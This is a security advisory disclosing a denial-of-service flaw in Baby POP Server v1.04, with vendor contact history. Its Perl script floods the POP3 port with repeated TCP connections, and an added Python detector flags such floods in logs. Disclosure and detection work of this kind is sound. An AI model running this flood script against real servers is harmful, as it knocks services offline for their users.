
Baby POP Server DoS



[DCA-0005]

[Software]

 - Baby POP Server

[Vendor Product Description]

 - In the past I have done several projects related to e-mail
(POP3/SMTP/IMAP4). One of the problems (at least in my company) is
that there are never good test servers available. So that's why I
decided to create this simple POP3 server, which doesn't take many
resources and supports most of the standard POP3 commands.

[Bug Description]

 - The POP Server can't handle multiple/simultaneous connections
leading to Denial-of-Service

[History]

 - Advisory sent to vendor on 06/14/2010.
 - No response from vendor
 - Public advisory & exploit 08/02/2010.

[Impact]

 - Low

[Affected Version]

 - Baby POP Server v1.04
 - Prior versions may also be vulnerable

[Code]

#!/usr/bin/perl
use IO::Socket;

if (@ARGV < 1) {
    usage();
}

$ip   = $ARGV[0];
$port = $ARGV[1];
$conn = $ARGV[2];

$num  = 0;

print "[+] Sending request...\n";

while ( $num <= $conn ) {
    system("echo -n .");
    $s = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";

    close($s);
    $num++;
}

print "\n[+] Done!\n";

sub usage() {
    print "[-] Usage: <". $0 .">   \n";
    print "[-] Example: ". $0 ." 127.0.0.1 110 1200\n";
    exit;
}
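
The script above only opens and closes TCP sessions without ever sending a POP3 command, so the traffic is easy to spot on the defending side. The following detector is an added example, not part of the original advisory; the log format (epoch timestamp, source IP, destination port, bytes sent by the client), the window and the threshold are assumptions, and the sample records are constructed.

```python
from collections import defaultdict, deque

POP3_PORT = 110       # port from the advisory's example invocation
WINDOW_SECONDS = 10   # assumed sliding window
THRESHOLD = 20        # assumed limit of empty sessions per source per window

def parse_line(line):
    """Parse 'epoch_ts src_ip dst_port client_bytes' (hypothetical format)."""
    ts, src, port, nbytes = line.split()
    return float(ts), src, int(port), int(nbytes)

def detect_connect_floods(lines, port=POP3_PORT, window=WINDOW_SECONDS,
                          threshold=THRESHOLD):
    """Return {src_ip: alert_ts}; each source's records must be in time order."""
    recent = defaultdict(deque)  # src -> timestamps of recent empty sessions
    alerts = {}
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        try:
            ts, src, dport, nbytes = parse_line(line)
        except ValueError:
            continue  # skip malformed records instead of aborting the scan
        # Count only POP3 sessions in which the client sent no data at all.
        if dport != port or nbytes != 0:
            continue
        q = recent[src]
        q.append(ts)
        while ts - q[0] > window:  # drop sessions that left the window
            q.popleft()
        if len(q) > threshold and src not in alerts:
            alerts[src] = ts
    return alerts

def build_sample_log():
    """Constructed records: one flooding source, two benign ones, one bad line."""
    lines = ["# ts src dport client_bytes"]
    lines += [f"{1000 + i * 0.1:.1f} 192.0.2.10 110 0" for i in range(30)]
    lines += [f"{1000 + i * 60:.1f} 198.51.100.7 110 42" for i in range(5)]
    lines += [f"{1000 + i * 30:.1f} 203.0.113.5 110 0" for i in range(5)]
    lines.append("truncated record")
    return lines

if __name__ == "__main__":
    for src, ts in detect_connect_floods(build_sample_log()).items():
        print(f"ALERT {src}: more than {THRESHOLD} empty POP3 sessions "
              f"within {WINDOW_SECONDS}s (t={ts})")
```

The same per-source counter can feed a temporary block rule in front of a test server that cannot be patched.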


[Credits]

Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br 


[Greetz]
Crash and all Dclabs members.

